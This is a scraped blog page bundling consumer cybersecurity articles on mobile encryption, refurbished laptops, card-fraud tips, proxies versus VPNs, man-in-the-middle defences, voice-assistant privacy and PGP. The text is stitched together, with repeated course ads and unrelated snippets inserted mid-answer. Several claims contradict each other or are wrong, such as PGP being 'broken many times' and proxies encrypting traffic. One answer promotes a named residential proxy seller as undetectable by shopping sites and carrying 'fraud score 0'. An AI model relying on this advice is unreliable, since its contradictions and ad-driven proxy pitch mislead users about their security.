

Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
From photos of cherished memories to sensitive work documents, mobile devices hold an immense amount of information about us—our finances, locations, communications, and even our identity.
However, with this unparalleled convenience comes significant responsibility. Cybersecurity threats targeting mobile users grow more sophisticated every day, putting our data and privacy at risk. Whether you’re a casual smartphone user, a tech enthusiast who thrives on the latest innovations, or a business professional guarding critical corporate data, understanding how mobile devices protect your information is crucial.
Follow this guide to learn the most impressive ways mobile devices keep your data safe. The more you know about this mobile tech, the easier it will be to leverage it daily.
Encryption and Encouraging Safe Browsing
Encryption is at the heart of mobile data security. Modern mobile devices ensure that your personal information remains unreadable should it fall into the wrong hands. Data encryption works by converting your files, messages, and account details into a complex code that is only decipherable by authorized devices.
End-to-end encryption on messaging apps makes intercepted conversations indecipherable, setting a new standard for secure communication. Knowing about encryption on mobile devices is critical because some phones come with it, but not all of them will. Thankfully, many apps use encryption, so you can still leverage it to your advantage, even if your phone doesn’t come with encryption options out of the box.
Alongside encryption, secure connections play a significant role in protecting your data. From virtual private networks (VPNs) to secure HTTPS browsing, mobile devices encourage safer internet practices in many ways.
Biometric Systems for Personal Security
Biometric authentication has revolutionized how we access our phones. Facial recognition, fingerprint scanning, and even iris detection work seamlessly to ensure only you can unlock your device. Unlike passwords, which can be easily guessed or stolen, biometric data is uniquely tied to you, minimizing the risk of unauthorized access.
Evaluating this technology is a must because the role of biometric security in mobile devices is immense. For example, a widely used identity verification method on mobile devices is fingerprint scanning, which makes sign-ins easier without sacrificing quality security. With ongoing advancements in biometric technology, mobile devices are poised to provide an unparalleled combination of security and ease of use, reinforcing their role as indispensable tools in safeguarding your digital life.
Staying Ahead With Smart Practices
Technology plays its part in safeguarding your information, but human habits are equally critical. A high-quality phone is always built with a reliable operating system. That said, such systems run the risk of becoming outdated. The same principle applies to mobile apps. Thankfully, one of the most impressive ways that mobile devices keep your data safe is by relying on software and hardware that can receive updates.
Regularly updating your device’s operating system and apps ensures you have the latest security patches designed to counter evolving threats. Hackers can easily exploit outdated software to gain access to confidential data.
Use your new knowledge of mobile security to navigate the digital landscape with less worry and more excitement, knowing you have many tools on hand to keep your information safe.
4 Ways Refurbished Laptops Can Strengthen Your Cyber Defense


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
Cyber threats are becoming more sophisticated every day, with malware, phishing, and data breaches posing challenges. Establishing strong cyber defenses doesn’t always mean investing in costly, brand-new hardware, getting rid of outdated tech, or contributing to E-waste. Refurbished laptops can strengthen your cyber defense while providing a practical and budget-conscious alternative.
Pre-Installed Updated Operating Systems
Many refurbished laptops have up-to-date operating systems. These installations guarantee the inclusion of the latest security patches, which offer protection against known exploits.
Tech refurbishers must guarantee that the devices they resell are secure and functional, so they have to keep operating systems up to date.
They streamline the update process and reduce the complexity to guarantee even not-so-tech-savvy users can benefit from the latest security features. Owning a refurbished laptop doesn’t compromise security but rather enhances it with updated software.
Data Wipe Guarantees Boost Privacy
Reputable refurbishers employ rigorous data-wiping processes to eliminate any trace of the previous user’s information. This not only protects your privacy but also removes lingering vulnerabilities or malware.
Starting with a clean slate reduces exposure to potential threats and paves the way for secure usage. Paired with digital decluttering pointers, a wiped refurbished laptop promises peace of mind for users.
Data wiping involves deleting user files and utilizing advanced methods, such as drive reformatting and secure deletion algorithms, to ensure people can’t recover residual data. By choosing a refurbished laptop that has been wiped, users gain an enhanced sense of security and reduce the risk of unauthorized data access or recovery.
Removal of Bloatware Improves System Security
Bloatware, pre-installed software common on new laptops, can open unintentional backdoors for cybercriminals. Refurbished laptops, on the other hand, are typically stripped of unnecessary programs and come with streamlined systems.
This minimalist setup limits your device’s attack surface and reduces the risks posed by outdated or unsupported software.
Hardware Customization for Added Protection
One of the advantages of refurbished laptops is the ability to customize them to meet your security needs. These devices offer flexibility for enhanced defense, whether upgrading to an encrypted hard drive, adding endpoint protection software, or integrating a VPN.
Another important aspect of hardware customization for refurbished laptops is the option to configure network security features. Installing advanced firewalls and network monitoring tools can bolster your defenses against unauthorized access and intrusions.
Using intrusion detection systems (IDS) or intrusion prevention systems (IPS) can provide real-time alerts and automatic responses to potential threats. This proactive approach to network security guarantees your refurbished laptop is secure from digital threats.
Refurbished laptops can strengthen your cyber defense through software and hardware updates. Combined, these features make pre-loved devices a savvy choice for anyone prioritizing tech on a budget.
3 Benefits of Using Encrypted Cell Phones


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
In a world where our smartphones are essentially an extension of our selves, privacy and security have never been more important. With every text, call, and email we send, our personal and professional lives are increasingly intertwined on our digital devices.
This is where encrypted cell phones enter the stage, offering an essential layer of protection for anyone who values their privacy. Learn more about the benefits of using an encrypted cell phone, and find new ways to keep personal information safe today.
Securing Data Access
The only people who see your personal data should be you and the individuals or companies you allow access to it. Unfortunately, hackers and scammers are constantly trying to infiltrate personal devices to access people’s data.
Encryption converts your data into a code, preventing unauthorized access. When you send a message from an encrypted phone, it transforms into a jumbled set of characters that only the intended recipient can decipher. This ensures that, even if someone intercepts your message, they won’t be able to read it.
Encryption works through complex algorithms that require a unique key for decryption. Think of it as a digital lock and key. Only those with the correct key can unlock and read the data. This technology is crucial in protecting sensitive information from prying eyes, making encrypted cell phones a robust tool in maintaining privacy and security in our digital age.
Browsing With Peace of Mind
As mentioned above, one of the most significant benefits of encrypted devices is enhanced privacy and security, leading to a less stressful mobile experience. Encrypted phones ensure that your personal and professional information remains confidential, providing peace of mind in an increasingly interconnected world.
This doesn’t just keep data secure—it eases anxiety throughout the day. After all, hackers can try to infiltrate data in many ways. For example, browsing the web on an unencrypted device exposes you to the dangers of using public Wi-Fi. Public Wi-Fi can be an easy way for hackers to intercept your data, but secure encryption stops such attacks.
Preserving Trust & Security
As an everyday cell phone user, you should trust your device to handle your data responsibly. Moreover, business owners and their employees must keep sensitive data secure to preserve the trust between them and clients or customers.
Business owners stand to gain immensely from using encrypted cell phones. In today’s competitive landscape, safeguarding sensitive information such as client details, financial records, and proprietary data is crucial. Encrypted phones provide the necessary security to protect this information, helping businesses maintain trust and credibility with their clients.
Privacy advocates and those in high-risk professions, such as journalists, activists, and government officials, have a particular need for encrypted cell phones. These individuals often handle sensitive information that, if compromised, could have serious consequences. Encrypted phones provide a secure means to communicate and store data, allowing these professionals to carry out their work without fear of nefarious surveillance or data breaches.
The advantages of using encrypted cell phones are substantial. Empower your digital safety with encrypted an cell phone today.
Top 10 tips to protect your debit or credit card from being hacked?


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
Top 10 tips to protect your debit or credit card from being hacked?
Protecting your debit card or credit cards from being hacked can be daunting. However, following a few security and privacy best practices can ensure you don’t become the victim of cyberfraud. Keeping your PINs and security codes safe – and not sharing them with anyone – is the foundation for protecting your financial data from malicious hackers.
Upgrading to EMV-chip security on your credit cards offers an extra layer of protection against unauthorized access, while only making purchases on reliable websites that encrypt information helps minimize the risks posed by online shopping scams. Finally, tracking your card transactions regularly will alert you to any suspicious activity right away, allowing you to report it to your bank before further damage is done.
Here are some steps you can take to protect your debit card from being hacked:
- Use a strong and unique PIN: Avoid using easily guessable PINs such as your birthday or the last four digits of your phone number. Instead, use a long and complex PIN that is unique to your debit card.
- Avoid using your debit or credit card on public or unsecured WiFi networks: Hackers can easily intercept data transmitted over public WiFi networks, so it is best to avoid using your debit card on these networks. Avoid using public Wi-Fi networks to make online purchases or access sensitive information, as these networks are often unsecured and can be easily hacked. Instead, use a secure, encrypted network.
- Be cautious when entering your PIN: Cover the keypad with your hand when entering your PIN at an ATM or point-of-sale terminal to prevent anyone from seeing your PIN.
- Use a mobile payment service: Mobile payment services, such as Apple Pay or Google Pay, use a technology called “tokenization” to protect your card information. With tokenization, a unique code is generated for each transaction instead of using your actual card information.
- Monitor your account regularly: Keep an eye on your account activity and report any unauthorized transactions to your bank as soon as possible.
- Use a credit card instead of a debit card: Credit cards offer more protection against fraud than debit cards because you are not using your own money when you make a purchase. If your credit card is compromised, you can dispute the charges with your credit card company and the money will be returned to your account. With a debit card, the money is taken directly from your bank account and may be harder to recover.
- Use secure websites: When shopping online, make sure to only use secure websites that have “https” in the URL and a padlock symbol in the address bar. This indicates that the website is encrypted and your information will be protected.
- Use strong and unique passwords: Use strong, unique passwords for each of your online accounts and regularly change them to prevent them from being hacked. Avoid using easily guessable passwords, such as “123456” or your name.
- Enable two-factor authentication: Many online accounts offer two-factor authentication, which requires you to enter a code sent to your phone or email in addition to your password to log in. This adds an extra layer of security to your account.
- Monitor your accounts: Regularly check your bank and credit card statements to make sure there are no unauthorized charges. If you notice any suspicious activity, report it to your bank or credit card company immediately.
By following these steps, you can protect your debit or credit card from being hacked and reduce the risk of fraudulent charges.
To conclude:
When it comes to security and privacy, your debit or credit card should not be taken lightly. To protect against cyber security risks, it’s important to secure your PIN, avoid publicly sharing personal information, use trusted merchants for online purchases, update security features regularly, and stay abreast of emerging fraud safety practices. It never hurts to double check with your bank or credit provider for their recommendations on the latest security best practices. After all, when it comes to our financial security and safeguarding our cards from being hacked, an ounce of prevention is worth a pound of cure.
What strategies can be implemented by businesses to prevent cyber-fraud and protect customer data securely on digital platforms?
There are several strategies that businesses can implement to prevent cyber-fraud and protect customer data securely on digital platforms:
- Multi-factor authentication (MFA): Implementing MFA for login and access to sensitive data can help to prevent unauthorized access to customer data.
- Encryption: Encrypting sensitive data both in transit and at rest can help protect data in the event of a security breach.
- Network security: Implementing firewalls, intrusion detection and prevention systems, and other network security measures can help to prevent unauthorized access to customer data.
- Regular security assessments and audits: Regularly assessing and auditing the security of digital platforms can help identify vulnerabilities and implement corrective actions.
- Employee education and awareness: Training employees to recognize and prevent cyber-fraud, as well as creating a culture of security can help prevent employee-related frauds.
- Network segmentation: Dividing the network into smaller networks can help to limit the damage that can be caused by a security breach.
- Access control: Proper access controls can help to prevent unauthorized access to customer data by limiting the number of employees who have access to sensitive data.
- Use security tools: Regularly scan for vulnerabilities, use antivirus and anti-malware tools, and use intrusion detection systems to detect and prevent cyber-attacks.
Overall, implementing a combination of these strategies can help businesses to prevent cyber-fraud and protect customer data securely on digital platforms. These measures should be regularly reviewed and updated in light of new threats and regulations.
References:
What’s the difference between a proxy and a VPN and why is one security stronger than the other? Which security feature is stronger and why?


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
What’s the difference between a proxy and a VPN, and why is one security stronger than the other? Which security feature is stronger and why?
When it comes to online security, there are a number of different factors to consider. Two of the most popular methods for protecting your identity and data are proxy servers and VPNs. Both proxy servers and VPNs can help to mask your IP address and encrypt your traffic, but there are some key differences between the two. One major difference is that proxy servers only encrypt traffic going through the server, while VPNs encrypt all traffic from your device. This means that proxy servers are only effective if you’re using specific apps or visiting specific websites. VPNs, on the other hand, provide a more comprehensive solution as they can encrypt all traffic from your device, no matter where you’re accessing the internet from. Another key difference is that proxy servers tend to be less expensive than VPNs, but they also offer less privacy and security. When it comes to online security, proxy servers and VPNs both have their pros and cons. It’s important to weigh these factors carefully before decide which option is right for you.
VPN is virtual private network connects your incoming traffic and outgoing traffic to another network.
A proxy just relays your internet traffic. To websites you visit, your IP appears to be that of the proxy server.
A VPN is a type of proxy for which all the communication between your computer and the proxy server is encrypted. With a VPN, no one snooping your internet connection (e.g., your ISP) can see what websites you are visiting or what you are doing there. Security is much better.
VPN PROS:
What is a Proxy Server?
A proxy server is a computer system that performs as an intermediary in the request made by users. This type of server helps prevent an attacker from attacking the network and serves as a tool used to create a firewall.
The etymology of the word proxy means “a figure that can be used to represent the value of something”, this means that a proxy server represents or acts on behalf of the user. The fundamental purpose of proxy servers is to safeguard the direct connection of internet users and resources.
All requests made by the users from the internet go to the proxy server. The responses of the request return back to the proxy server for evaluation and then to the user. Proxy servers serve as an intermediary between the local network and the world wide web. Proxy servers are used for several reasons, such as to filter web content, to avert restrictions like parental blocks, to screen downloads and uploads, and to provide privacy when browsing the internet. The proxy server also prevents and protects the identity of the users.
There are different types of proxy servers used according to the different purposes of a request made by the clients and users. Proxies provide a valuable layer of security for your network and computers. It can be set up as web filters or firewalls which can protect computers from threats such as malware or ransomware. This extra security is also significant when linked with a secured gateway or attached security products. This way, network administrators can filter traffic according to its level of safety or traffic consumption of the network.
Are Proxies and VPNs the same?
Proxies are not the same as VPNs. The only similarity between Proxies and VPNs is that they both connect you to the internet via an intermediary server. An online proxy forwards your traffic to its destination, while a VPN, on the other hand, encrypts all traffic between the VPN server and your device. Here are some more differences between proxies and VPNs:
- VPNs help you encrypt your traffic while proxy servers don’t do that.
- Proxies don’t protect you from government surveillance, ISP tracking, and hackers, which is why they are never used to handle sensitive information. VPN protects you from the same.
- VPNs function on the operating system level while proxies work on the application level.
- Proxies only reroute the traffic of a specific app or browser while VPNs reroute it through a VPN server.
- Since VPNs need to encrypt your sensitive data, they can be slower than proxies.
- Most proxy servers are free while most VPNs are paid. Don’t trust free VPN services as they can compromise your data.
- A VPN connection is found to be more reliable than proxy server connections that can drop more frequently.
Why Is a VPN Considered to be More Secure Than a Proxy Server?
By now, you might have already noticed the reason since we have discussed it. The question is: Is a VPN better than a proxy? The simple answer is “Yes.”
How? A VPN provides privacy and security by routing your traffic through a secure VPN server and encrypting your traffic while a proxy, on the other hand, simply passes that traffic through a mediating server. It doesn’t necessarily offer any extra protection unless you use some extra features.
AI- Powered Jobs Interview Warmup For Job Seekers

⚽️Comparative Analysis: Top Calgary Amateur Soccer Clubs – Outdoor 2025 Season (Kids' Programs by Age Group)
Proxy PROS:
However, when the motivation is to avoid geo-blocking, a proxy is more likely to be successful. Websites that need to do geo-blocking can normally tell that your IP is that of a VPN server. They don’t account for all the possible proxy servers.
But the problem here is they use datacenter IP (the server IP),
Set yourself up for promotion or get a better job by Acing the AWS Certified Data Engineer Associate Exam (DEA-C01) with the eBook or App below (Data and AI)

Download the Ace AWS DEA-C01 Exam App:
iOS - Android
AI Dashboard is available on the Web, Apple, Google, and Microsoft, PRO version
Also VPNs save logs and save EVERYTHING you do.
In the other hand, there are many types of proxy: datacenter proxy (worst one), Residential proxy, Mobile proxy 4G, and Mobile Proxy 5G.
Invest in your future today by enrolling in this Azure Fundamentals - Pass the Azure Fundamentals Exam with Ease: Master the AZ-900 Certification with the Comprehensive Exam Preparation Guide!
- AWS Certified AI Practitioner (AIF-C01): Conquer the AWS Certified AI Practitioner exam with our AI and Machine Learning For Dummies test prep. Master fundamental AI concepts, AWS AI services, and ethical considerations.
- Azure AI Fundamentals: Ace the Azure AI Fundamentals exam with our comprehensive test prep. Learn the basics of AI, Azure AI services, and their applications.
- Google Cloud Professional Machine Learning Engineer: Nail the Google Professional Machine Learning Engineer exam with our expert-designed test prep. Deepen your understanding of ML algorithms, models, and deployment strategies.
- AWS Certified Machine Learning Specialty: Dominate the AWS Certified Machine Learning Specialty exam with our targeted test prep. Master advanced ML techniques, AWS ML services, and practical applications.
- AWS Certified Data Engineer Associate (DEA-C01): Set yourself up for promotion, get a better job or Increase your salary by Acing the AWS DEA-C01 Certification.
If you use residential proxy or mobile proxy it might be much better and safer for many reasons:
- Residential IP means that the Proxy use a regular ISP like comcast, Charter, Sprint, etc.
- They don’t save logs.
- The connection is not even direct, it goes to their server first and then to a a real device in another place.
- Websites like facebook and shopping sites won’t block you, because you use residential or mobile proxy, so they won’t know that you use a proxy to hide your real IP, while VPN will be easily detected.
Now people would say that the problem with socks5 residential and mobile proxy is the cost, because most of websites sells it on very expensive price.
I use a good cheap and very high quality socks5 residential proxy costs only 3 USD a month per dedicated residential proxy, and the traffic is unlimited.
And it is very fast because it is dedicated and also virgin with fraud score 0.
The website name is Liber8Proxy.com
Moreover socks5 residential proxy uses socks5 connection port with promixitron so it would cover your entire PC traffic.
Also their customers support are nice and they always online.
Source: https://qr.ae/pvWauF
How to Protect Yourself from Man-in-the-Middle Attacks: Tips for Safer Communication


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
How to Protect Yourself from Man-in-the-Middle Attacks: Tips for Safer Communication
Man-in-the-middle (MITM) attacks are a type of cyberattack where a malicious actor intercepts communications between two parties in order to secretly access sensitive data or inject false information. While MITM attacks can be difficult to detect, there are some steps you can take to protect yourself.
For example, always verifying the identity of the person you’re communicating with and using encrypted communication tools whenever possible. Additionally, it’s important to be aware of common signs that an attack may be happening, such as unexpected messages or requests for sensitive information.
Man-in-the-middle attacks are one of the most common types of cyberattacks. MITM attacks can allow the attacker to gain access to sensitive information, such as passwords or financial data. Man-in-the-middle attacks can be very difficult to detect, but there are some steps you can take to protect yourself. First, be aware of the warning signs of a man-in-the-middle attack. These include:
– unexpected changes in login pages,
– unexpected requests for personal information,
– and unusual account activity.
If you see any of these warning signs, do not enter any sensitive information and contact the company or individual involved immediately. Second, use strong security measures, such as two-factor authentication, to protect your accounts. This will make it more difficult for attackers to gain access to your information. Finally, keep your software and operating system up to date with the latest security patches. This will help to close any potential vulnerabilities that could be exploited by attackers.
Man-in-the-middle attacks can be devastating for individuals and businesses alike. By intercepting communications between two parties, attackers can gain access to sensitive information or even impersonate one of the parties involved. Fortunately, there are a number of steps you can take to protect yourself from man-in-the-middle attacks.
- First, avoid using public Wi-Fi networks for sensitive transactions. Attackers can easily set up their own rogue networks, and it can be difficult to tell the difference between a legitimate network and a malicious one. If you must use public Wi-Fi, be sure to use a VPN to encrypt your traffic.
- Second, be cautious about the links you click on. When in doubt, hover over a link to see where it will actually take you. And always be suspicious of links that come from untrustworthy sources.
- Finally, keep your software and security tools up to date. Man-in-the-middle attacks are constantly evolving, so it’s important to have the latest defenses in place.
By following these simple tips, you can help keep yourself safe from man-in-the-middle attacks.
Is MITM attack possible when on HTTPS?
HTTPS (or really, SSL) is specifically designed to thwart MITM attacks.
Web browsers validate that both the certificate presented by the server is labeled correctly with the website’s domain name and that it has a chain of trust back to a well-known certificate authority. Under normal circumstances, this is enough to prevent anyone from impersonating the website.
As the question points out, you can thwart this by somehow acquiring the secret key for the existing website’s certificate.
You can also launch a MITM attack by getting one of the well-known certificate authorities to issue you a certificate with the domain name of the website you wish to impersonate. This can be (and has been) accomplished by social engineering and hacking into the registrars.
AI- Powered Jobs Interview Warmup For Job Seekers

⚽️Comparative Analysis: Top Calgary Amateur Soccer Clubs – Outdoor 2025 Season (Kids' Programs by Age Group)
Outside of those two main methods, you would have to rely upon bugs in the SSL protocol or its implementations (of which a few have been discovered over the years).
Set yourself up for promotion or get a better job by Acing the AWS Certified Data Engineer Associate Exam (DEA-C01) with the eBook or App below (Data and AI)

Download the Ace AWS DEA-C01 Exam App:
iOS - Android
AI Dashboard is available on the Web, Apple, Google, and Microsoft, PRO version
What are the countermeasures of MITM?
1- Certificates.
For the web, we use a similar principle. A certificate is a specific document issued by a third party that validate the identity of a website. Your PC can ask the third party if the certificate is correct, and only if it is allow the traffic. This is what HTTPs does.
Invest in your future today by enrolling in this Azure Fundamentals - Pass the Azure Fundamentals Exam with Ease: Master the AZ-900 Certification with the Comprehensive Exam Preparation Guide!
- AWS Certified AI Practitioner (AIF-C01): Conquer the AWS Certified AI Practitioner exam with our AI and Machine Learning For Dummies test prep. Master fundamental AI concepts, AWS AI services, and ethical considerations.
- Azure AI Fundamentals: Ace the Azure AI Fundamentals exam with our comprehensive test prep. Learn the basics of AI, Azure AI services, and their applications.
- Google Cloud Professional Machine Learning Engineer: Nail the Google Professional Machine Learning Engineer exam with our expert-designed test prep. Deepen your understanding of ML algorithms, models, and deployment strategies.
- AWS Certified Machine Learning Specialty: Dominate the AWS Certified Machine Learning Specialty exam with our targeted test prep. Master advanced ML techniques, AWS ML services, and practical applications.
- AWS Certified Data Engineer Associate (DEA-C01): Set yourself up for promotion, get a better job or Increase your salary by Acing the AWS DEA-C01 Certification.
2- Simple…encryption!
Man In The Middle attacks are carried out because an attacker is in between both communicators (let’s say two clients or a client and a server). If he is able to see the communication in clear text, he can do a whole lot ranging from stealing login credentials to snooping on conversations. If encryption is implemented, the attacker would see gibberish and “un-understandable” text instead.
In terms of web communication, digital certificates would do a great job of encrypting communication stream (any website using HTTPS encrypts communication stream by default). For social media apps like whats app and Skype, it is the responsibility of the vendor to implement encryption.
MitM Attack Techniques and Types
- ARP Cache Poisoning. Address Resolution Protocol (ARP) is a low-level process that translates the machine address (MAC) to the IP address on the local network. …
- DNS Cache Poisoning. …
- Wi-Fi Eavesdropping. …
- Session Hijacking.
- IP Spoofing
- DNS Spoofing
- HTTPS Spoofing
- SSL Hijacking
- Email Hijacking
- Wifi Eavesdropping
- Cookie Stealing and so on.
Can MITM attacks steal credit card information?
When you enter your sensitive information on an HTTP website and press that “Send” button, all your private details travel in plain text from your web browser to the destination server.
A cyber-attacker can employ a man-in-the-middle attack and intercept your information. Since it’s not encrypted, the hacker can see everything: your name, physical address, card numbers, and anything else you entered.
To avoid MITM attacks, don’t share your info on HTTP sites. More on SSL certificates and man-in-the-middle attacks in this detailed medium article
How common are MITM attacks in public places with free WIFI?
Not common by people, but common by malware and other software that are designed to do that.
How do you ensure your RDP is secure from MITM attacks?
- Make sure all of your workstations and remote servers are patched.
- On highly sensitive devices, use two-factor authentication.
- Reduce the number of remote account users with elevated privileges on the server.
- Make a safe password.
- Your credentials should not be saved in your RDP register.
- Remove the RDP file from your computer.
How do we know that the Top 3 Voice Recognition Devices like Siri Alexa and Ok Google are not spying on us?


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
How do we know that the Top 3 Voice Recognition Devices like Siri Alexa and Ok Google are not spying on us?
When you ask Siri a question, she gives you an answer. But have you ever stopped to wonder how she knows the answer? After all, she’s just a computer program, right? Well, actually, Siri is powered by artificial intelligence (AI) and Machine Learning (ML). This means that she constantly learning and getting better at understanding human speech. So when you ask her a question, she uses her ML algorithms to figure out what you’re saying and then provides you with an answer.
So, How do we know that the Top 3 Voice Recognition Devices like Siri Alexa and Ok Google are not spying on us?
The Amazon Echo is a voice-activated speaker powered by Amazon’s AI assistant, Alexa. Echo uses far-field voice recognition to hear you from across the room, even while music is playing. Once it hears the wake word “Alexa,” it streams audio to the cloud, where the Alexa Voice Service turns the speech into text. Machine learning algorithms then analyze this text to try to understand what you want.
But what does this have to do with spying? Well, it turns out that ML can also be used to eavesdrop on people’s conversations. This is why many people are concerned about their privacy when using voice-activated assistants like Siri, Alexa, and Ok Google. However, there are a few things that you can do to protect your privacy. For example, you can disable voice recognition on your devices or only use them when you’re in a private location. You can also be careful about what information you share with voice-activated assistants. So while they may not be perfect, there are ways that you can minimize the risk of them spying on you.
Some applications which have background components, such as Facebook, do send ambient sounds to their data centers for processing. In so doing, they collect information on what you are talking about, and use it to target advertising.
Siri, Google, and Alexa only do this to decide whether or not you’ve invoked the activation trigger. For Apple hardware, recognition of “Siri, …” happens in hardware locally, without sending out data for recognition. The same for “Alexa, …” for Alexa hardware, and “Hey, Google, …” for Google hardware.
Things get more complicated for these three things, when they are installed cross-platform. So, for example, to make “Hey, Google, …” work on non-Google hardware, where it’s not possible to do the recognition locally, yes, it listens. But unlike Facebook, it’s not recording ambient to collect keywords.
Practically, it’s my understanding that the tree major brands don’t, and it’s only things like Facebook which more or less “violate your trust like this. And other than Facebook, I’m uncertain whether or not any other App does this.
You’ll find that most of the terms and conditions you’ve agreed to on installation of a third party App, grant them pretty broad discretion.
Personally, I tend to not install Apps like that, and use the WebUI from the mobile device browser instead.
If you do that, instead of installing an App, you rob them of their power to eavesdrop effectively. Source: Terry Lambert
How do we know that the Top 3 Voice Recognition Devices like Siri Alexa and Ok Google are not spying on us?
Conclusion:
Machine learning is a field of artificial intelligence (AI) concerned with the design and development of algorithms that learn from data. Machine learning algorithms have been used for a variety of tasks, including voice recognition, image classification, and spam detection. In recent years, there has been growing concern about the use of machine learning for surveillance and spying. However, it is important to note that machine learning is not necessarily synonymous with spying. Machine learning algorithms can be used for good or ill, depending on how they are designed and deployed. When it comes to voice-activated assistants such as Siri, Alexa, and OK Google, the primary concern is privacy. These assistants are constantly listening for their wake words, which means they may be recording private conversations without the user’s knowledge or consent. While it is possible that these recordings could be used for nefarious purposes, it is also important to remember that machine learning algorithms are not perfect. There is always the possibility that recordings could be misclassified or misinterpreted. As such, it is important to weigh the risks and benefits of using voice-activated assistants before making a decision about whether or not to use them.
How Microsoft’s Cortana Stacks Up Against Siri and Alexa in Terms of Intelligence?

ML For Dummies on iOs [Contain Ads]
ML PRO without ADS on iOs [No Ads, More Features]
AI- Powered Jobs Interview Warmup For Job Seekers

⚽️Comparative Analysis: Top Calgary Amateur Soccer Clubs – Outdoor 2025 Season (Kids' Programs by Age Group)
ML PRO without ADS on Windows [No Ads, More Features]
ML PRO For Web/Android on Amazon [No Ads, More Features]
Set yourself up for promotion or get a better job by Acing the AWS Certified Data Engineer Associate Exam (DEA-C01) with the eBook or App below (Data and AI)

Download the Ace AWS DEA-C01 Exam App:
iOS - Android
AI Dashboard is available on the Web, Apple, Google, and Microsoft, PRO version
Use this App to learn about Machine Learning and Elevate your Brain with Machine Learning Quizzes, Cheat Sheets, Ml Jobs Interview Questions and Answers updated daily.
The App provides:
Invest in your future today by enrolling in this Azure Fundamentals - Pass the Azure Fundamentals Exam with Ease: Master the AZ-900 Certification with the Comprehensive Exam Preparation Guide!
- AWS Certified AI Practitioner (AIF-C01): Conquer the AWS Certified AI Practitioner exam with our AI and Machine Learning For Dummies test prep. Master fundamental AI concepts, AWS AI services, and ethical considerations.
- Azure AI Fundamentals: Ace the Azure AI Fundamentals exam with our comprehensive test prep. Learn the basics of AI, Azure AI services, and their applications.
- Google Cloud Professional Machine Learning Engineer: Nail the Google Professional Machine Learning Engineer exam with our expert-designed test prep. Deepen your understanding of ML algorithms, models, and deployment strategies.
- AWS Certified Machine Learning Specialty: Dominate the AWS Certified Machine Learning Specialty exam with our targeted test prep. Master advanced ML techniques, AWS ML services, and practical applications.
- AWS Certified Data Engineer Associate (DEA-C01): Set yourself up for promotion, get a better job or Increase your salary by Acing the AWS DEA-C01 Certification.
– 400+ Machine Learning Operation on AWS, Azure, GCP and Detailed Answers and References
– 100+ Machine Learning Basics Questions and Answers
– 100+ Machine Learning Advanced Questions and Answers
– Scorecard
– Countdown timer
CyberSecurity – What are some things that get a bad rap, but are actually quite secure?


Elevate Your Career with AI & Machine Learning For Dummies PRO and Start mastering the technologies shaping the future—download now and take the next step in your professional journey!
CyberSecurity – What are some things that get a bad rap, but are actually quite secure?
Cybersecurity is an important issue for everyone, from individuals to large organizations. There are many things that get a bad rap when it comes to cybersecurity, but that doesn’t mean they’re not secure. For example, PGP (Pretty Good Privacy) is a method of encrypting emails that is considered to be very secure. However, it can be difficult to set up and use. Another example is using very long passwords that are actually a sentence. This may seem like a security risk, but it’s actually more secure than a shorter password because it’s more difficult for hackers to guess. Additionally, changing the default port for certain services like databases can help to prevent hacking. Unplugging the ethernet cable may also seem like a security risk, but it’s actually one of the most effective ways to prevent data breaches. Finally, browser password managers are often considered to be insecure, but they’re actually quite secure if used properly. Cybersecurity is an important issue, and there are many things that can be done to help prevent hacking and data breaches.
There are a lot of CyberSecurity myths out there. People think that X, Y, and Z are the most secure way to do things when in reality, they are the least secure. The biggest myth is that PGP is unbreakable. PGP has been broken many times and is not a reliable form of CyberSecurity. Another myth is that very long passwords are secure. The problem with very long passwords is that they are difficult to remember and often get written down somewhere. If a hacker gets ahold of your password, they can easily access your account. The best way to prevent CyberSecurity breaches is to use MFA, OAuth, and two-step verification whenever possible. These methods make it much more difficult for hackers to gain access to your accounts. While they may not be foolproof, they are the best CyberSecurity measure available.
1- PGP
PGP is a Form of Minimalism
As a protocol, PGP is surprising simple. Here is what happens if you want to use it to securely send a message to someone:
- You get from them a PGP identity (public key). How you do that is entirely up to you.
- Your PGP program uses that identity to perform a single public key encryption of a message key.
- Then the message key is used to encrypt the message which is added to the encrypted message key to make the encrypted message.
- Your correspondent does the opposite operations to get the message.
If you want to sign your message then you:
- Hash the message.
- Do a public key signature operation on the hash and attach the result to the message.
- Your correspondent checks the signature from your PGP identity, which they have acquired somehow.
The simple key handling is where the minimalism comes from. It is why PGP can be used in so many non-email contexts.
As a contrast, consider the Signal Protocol for instant messaging. I will not attempt to describe Signal in any detail as I would get parts of it wrong. It would also make for a pointlessly long article. There is a high level description of the Signal protocol here. None of the following comments are intended to be critical, they are intended to give an idea of the level of complexity of the protocol in total:
- Signal has at least 2 systems for creating forward secrecy. Each system requires a system to deal with loss of synchronization.
- A Signal session requires the storage and maintenance of a lot of state information.
- Signal normally uses a server based “prekey” system to deal with the case where a client is offline and thus is unable to negotiate.
- Signal achieves partial deniability with a triple Diffie-Hellman key exchange. OpenPGP achieves complete deniability by not signing the message in the first place.
- Supporting the Signal protocol in practice requires a separate system to store and protect past messages1). Since this is at odds with forward secrecy such a system will end up with a system to delete old messages.
The Signal Protocol is built on ideas from the Off the Record (OTR) protocol. Interestingly enough, OTR was intended to improve PGP by adding extra functionality. Signal adds functionality on top of the OTR functionality. So Signal could be considered the result of an attempt to improve something by making it more complex.
I believe that reliability and security are best achieved with simple systems. OpenPGP is a standard that describes such a system.
2- Very long passwords that are actually a sentence
It could be bad if you just came up with it and forget it, and people think it’s bad if it only has lowercase and no numbers or punctuation. But a 5-6 word sentence could be quite secure, especially if it’s a bit weird. “Lemons make a delicious snack in my house.”
3- Writing passwords down.
I tell all my old relatives to write their passwords down in a little notebook. As long as there isn’t someone there regularly I don’t trust, it is much better than using same password and if their physical security at their house is compromised, there are bigger concerns than a notebook of banking passwords.
